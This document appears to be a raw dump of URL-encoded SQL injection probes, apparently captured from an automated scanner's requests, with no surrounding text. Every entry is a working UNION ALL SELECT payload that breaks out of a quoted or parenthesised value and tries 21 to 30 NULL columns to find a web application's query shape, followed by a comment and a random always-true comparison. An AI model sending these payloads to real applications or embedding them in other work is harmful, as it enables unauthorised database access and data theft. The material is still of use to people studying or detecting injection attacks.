1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27HkTW%27%3D%27HkTW 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27ehWA%27%3D%27ehWA 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27ojMb%27%3D%27ojMb 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27jfAH%27%3D%27jfAH 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27kxzT%27%3D%27kxzT 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27psJw%27%3D%27psJw 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27vyqc%27%3D%27vyqc 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27TXha%27%3D%27TXha 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27xWiP%27%3D%27xWiP 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27mzDh%27%3D%27mzDh 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27hlUI%27%3D%27hlUI 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27WkXM%27%3D%27WkXM 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27LnFY%27%3D%27LnFY 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27Ibje%27%3D%27Ibje 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27KCBZ%27%3D%27KCBZ 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27tsqO%27%3D%27tsqO 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27paxD%27%3D%27paxD 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27AxoP%27%3D%27AxoP 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27FEsc%27%3D%27FEsc 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27TbXJ%27%3D%27TbXJ 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27xJRr%27%3D%27xJRr 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27SNLC%27%3D%27SNLC 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27lcHD%27%3D%27lcHD 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27Xhgt%27%3D%27Xhgt 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27oxGg%27%3D%27oxGg 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27ALDr%27%3D%27ALDr 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27ScVh%27%20LIKE%20%27ScVh 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27OPHA%27%20LIKE%20%27OPHA 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27PRzA%27%20LIKE%20%27PRzA 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27YnHS%27%20LIKE%20%27YnHS 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27cTXL%27%20LIKE%20%27cTXL 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27bNQX%27%20LIKE%20%27bNQX 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27kYBy%27%20LIKE%20%27kYBy 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27RhRd%27%20LIKE%20%27RhRd 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27arhn%27%20LIKE%20%27arhn 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27LDcs%27%20LIKE%20%27LDcs 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27WKGd%27%20LIKE%20%27WKGd 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27CHzp%27%20LIKE%20%27CHzp 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27stZw%27%20LIKE%20%27stZw 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27CALA%27%20LIKE%20%27CALA 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27sugp%27%20LIKE%20%27sugp 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27PAup%27%20LIKE%20%27PAup 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27dcYI%27%20LIKE%20%27dcYI 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27vRQp%27%20LIKE%20%27vRQp 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27sLSe%27%20LIKE%20%27sLSe 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27UQwl%27%20LIKE%20%27UQwl 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27fUcB%27%20LIKE%20%27fUcB 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27xWmi%27%20LIKE%20%27xWmi 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27EyhI%27%20LIKE%20%27EyhI 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27tHkV%27%20LIKE%20%27tHkV 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27CACm%27%20LIKE%20%27CACm 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27JLNC%27%20LIKE%20%27JLNC 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27ojbn%27%20LIKE%20%27ojbn 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27xDnw%27%20LIKE%20%27xDnw 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27gfUY%27%20LIKE%20%27gfUY 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27EsdL%27%20LIKE%20%27EsdL 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27fIEo%27%20LIKE%20%27fIEo 